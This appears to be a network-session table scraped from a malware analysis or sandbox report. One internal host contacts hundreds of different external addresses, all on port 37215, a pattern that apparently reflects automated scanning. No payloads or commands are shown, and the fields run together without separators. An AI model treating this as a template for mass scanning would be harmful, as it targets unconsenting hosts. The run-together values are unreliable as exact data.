                                                          5741192.168.2.155317641.155.77.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5742192.168.2.154525261.101.151.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5743192.168.2.155942453.163.255.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5744192.168.2.154092041.224.218.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5745192.168.2.1537010157.101.88.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5746192.168.2.1545650222.112.111.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5747192.168.2.1538116197.212.217.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5748192.168.2.1556048197.112.213.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5749192.168.2.1533308134.151.50.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5750192.168.2.153789041.247.151.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5751192.168.2.1559080180.28.129.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5752192.168.2.153918041.127.217.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5753192.168.2.1554766157.163.219.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5754192.168.2.1536456164.170.232.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5755192.168.2.155093641.104.240.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5756192.168.2.153716441.65.245.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5757192.168.2.1553816205.110.1.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5758192.168.2.1560366157.81.12.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5759192.168.2.1558272157.170.65.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5760192.168.2.155524041.239.210.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5761192.168.2.154190841.15.84.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5762192.168.2.154959488.78.45.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5763192.168.2.155184824.82.54.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5764192.168.2.1539422197.190.216.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5765192.168.2.1542346157.98.64.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5766192.168.2.1542800197.37.68.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5767192.168.2.1534908197.95.130.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5768192.168.2.154360841.99.4.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5769192.168.2.153955091.27.56.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5770192.168.2.1537266157.124.247.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5771192.168.2.1540108197.111.235.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5772192.168.2.155048813.54.75.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5773192.168.2.1547224157.136.253.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5774192.168.2.1539262157.90.215.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5775192.168.2.1534872197.109.134.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5776192.168.2.1558530197.135.18.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5777192.168.2.1553652197.6.29.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5778192.168.2.1543226149.78.173.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5779192.168.2.1537288197.114.28.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5780192.168.2.1558978182.182.214.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5781192.168.2.153825241.233.144.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5782192.168.2.1551772197.147.202.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5783192.168.2.155708641.141.223.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5784192.168.2.1558684177.18.17.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5785192.168.2.1546568157.164.96.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5786192.168.2.153698641.52.27.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5787192.168.2.1544252157.44.39.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5788192.168.2.1549530197.159.72.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5789192.168.2.154438849.24.155.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5790192.168.2.1544092157.57.239.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5791192.168.2.1552100157.8.168.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5792192.168.2.153627441.226.85.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5793192.168.2.153702095.194.238.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5794192.168.2.153357041.153.74.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5795192.168.2.1539334157.134.74.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5796192.168.2.155125641.12.67.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5797192.168.2.1553936162.0.146.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5798192.168.2.1560730157.52.149.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5799192.168.2.1535230197.203.21.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5800192.168.2.1560814151.54.119.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5801192.168.2.1538356197.149.128.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5802192.168.2.1534186157.74.132.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5803192.168.2.1552106197.249.77.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5804192.168.2.1541528197.152.23.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5805192.168.2.1533520184.0.200.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5806192.168.2.1551770157.221.117.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5807192.168.2.155524041.104.222.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5808192.168.2.1544016157.24.236.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5809192.168.2.1551686197.9.183.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5810192.168.2.155177241.88.160.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5811192.168.2.155212641.84.16.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5812192.168.2.1542768160.132.135.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5813192.168.2.155113862.252.111.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5814192.168.2.155936889.14.48.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5815192.168.2.1545380197.17.23.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5816192.168.2.1554968208.216.242.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5817192.168.2.1538292157.103.247.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5818192.168.2.154255041.135.45.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5819192.168.2.1537146157.80.190.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5820192.168.2.153443864.252.121.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5821192.168.2.154960843.47.84.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5822192.168.2.1541736157.129.61.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5823192.168.2.1555068157.108.190.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5824192.168.2.1544794194.239.202.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5825192.168.2.1560088139.57.105.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5826192.168.2.1557914197.195.154.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5827192.168.2.1535406157.250.233.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5828192.168.2.1551652157.112.33.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5829192.168.2.156000041.231.241.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5830192.168.2.1558580157.168.174.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5831192.168.2.153479641.68.253.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5832192.168.2.1537096197.22.219.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5833192.168.2.155621241.188.180.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5834192.168.2.153759041.217.199.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5835192.168.2.1560868141.92.115.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5836192.168.2.1545110157.40.206.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5837192.168.2.1557298157.91.33.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5838192.168.2.1544056197.231.220.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5839192.168.2.154574641.247.101.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5840192.168.2.1547796169.207.240.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5841192.168.2.156016641.35.223.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5842192.168.2.1536996157.199.141.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5843192.168.2.1547496197.253.101.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5844192.168.2.1535354157.130.19.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5845192.168.2.1550842157.215.243.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5846192.168.2.154788241.13.220.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5847192.168.2.1558954202.225.68.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5848192.168.2.154476841.3.98.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5849192.168.2.1545068197.96.79.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5850192.168.2.1545926132.203.158.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5851192.168.2.1535238157.85.250.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5852192.168.2.154784241.229.150.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5853192.168.2.1544924197.21.161.21137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5854192.168.2.1550608157.24.13.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5855192.168.2.1552662111.116.67.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5856192.168.2.1545188157.122.210.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5857192.168.2.154545841.0.253.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5858192.168.2.1558564197.244.32.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5859192.168.2.154324495.88.110.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5860192.168.2.154611041.92.14.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5861192.168.2.1534674157.92.15.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5862192.168.2.1541620132.235.178.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5863192.168.2.154500241.126.198.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5864192.168.2.1554088157.166.220.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5865192.168.2.1553232197.86.212.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5866192.168.2.1555804197.115.135.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5867192.168.2.1550404140.161.156.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5868192.168.2.156081841.77.82.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5869192.168.2.153963063.117.79.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5870192.168.2.155757841.151.60.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5871192.168.2.1545174197.231.206.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5872192.168.2.1533118197.86.61.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5873192.168.2.153938041.41.84.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5874192.168.2.1540438157.245.184.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5875192.168.2.1554400197.151.98.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5876192.168.2.1534150197.228.60.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5877192.168.2.1551354157.182.152.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5878192.168.2.1543946106.202.81.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5879192.168.2.1544488157.60.213.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5880192.168.2.1534668197.42.49.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5881192.168.2.1553842157.152.146.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5882192.168.2.1534092106.135.181.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5883192.168.2.155463641.152.244.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5884192.168.2.1546840190.123.80.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5885192.168.2.1559968197.230.89.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5886192.168.2.1556186128.241.245.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5887192.168.2.1552216157.142.82.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5888192.168.2.1551952197.102.193.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5889192.168.2.153881041.191.171.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5890192.168.2.1543052157.249.19.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5891192.168.2.1556614157.217.63.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5892192.168.2.1557170203.188.70.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5893192.168.2.154072274.138.206.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5894192.168.2.1541362197.184.146.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5895192.168.2.1552170157.45.231.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5896192.168.2.1533116157.232.249.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5897192.168.2.1547868157.190.159.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5898192.168.2.1534444157.50.216.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5899192.168.2.155097841.237.16.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5900192.168.2.1543356197.125.114.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5901192.168.2.1534694157.92.174.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5902192.168.2.155797680.240.238.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5903192.168.2.154912241.249.123.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5904192.168.2.154044241.108.57.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5905192.168.2.1534940157.1.246.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5906192.168.2.154683441.65.137.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5907192.168.2.1534798157.232.174.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5908192.168.2.1543396197.111.98.8137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5909192.168.2.155823441.191.14.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5910192.168.2.1552640157.254.245.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5911192.168.2.155318899.167.135.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5912192.168.2.154161041.134.66.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5913192.168.2.154549441.180.249.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5914192.168.2.1540614197.24.248.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5915192.168.2.1539532197.177.105.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5916192.168.2.155865041.45.138.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5917192.168.2.1544102186.39.234.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5918192.168.2.156030641.45.172.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5919192.168.2.1555926157.139.232.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5920192.168.2.153317441.38.196.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5921192.168.2.1535780131.27.12.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5922192.168.2.1555646157.12.32.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5923192.168.2.1557596197.146.151.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5924192.168.2.1558104197.23.205.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5925192.168.2.153375041.229.125.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5926192.168.2.153625441.101.10.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5927192.168.2.1539974157.135.155.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5928192.168.2.1539268197.53.66.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5929192.168.2.1546178197.146.120.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5930192.168.2.1551620157.71.132.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5931192.168.2.1554862197.252.118.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5932192.168.2.1534648157.2.115.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5933192.168.2.155407641.150.77.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5934192.168.2.154653641.130.232.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5935192.168.2.1554660157.159.32.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5936192.168.2.154962041.49.133.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5937192.168.2.1549922197.126.67.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5938192.168.2.154791441.58.85.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5939192.168.2.1555076157.62.17.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5940192.168.2.1549954197.70.28.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5941192.168.2.153608641.106.176.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5942192.168.2.155341641.60.40.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5943192.168.2.153327441.57.197.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5944192.168.2.1548298157.197.10.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5945192.168.2.1557634179.203.253.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5946192.168.2.155838241.211.4.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5947192.168.2.1539756197.214.235.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5948192.168.2.1553466157.127.56.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5949192.168.2.1559106150.126.162.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5950192.168.2.153997436.241.154.18237215
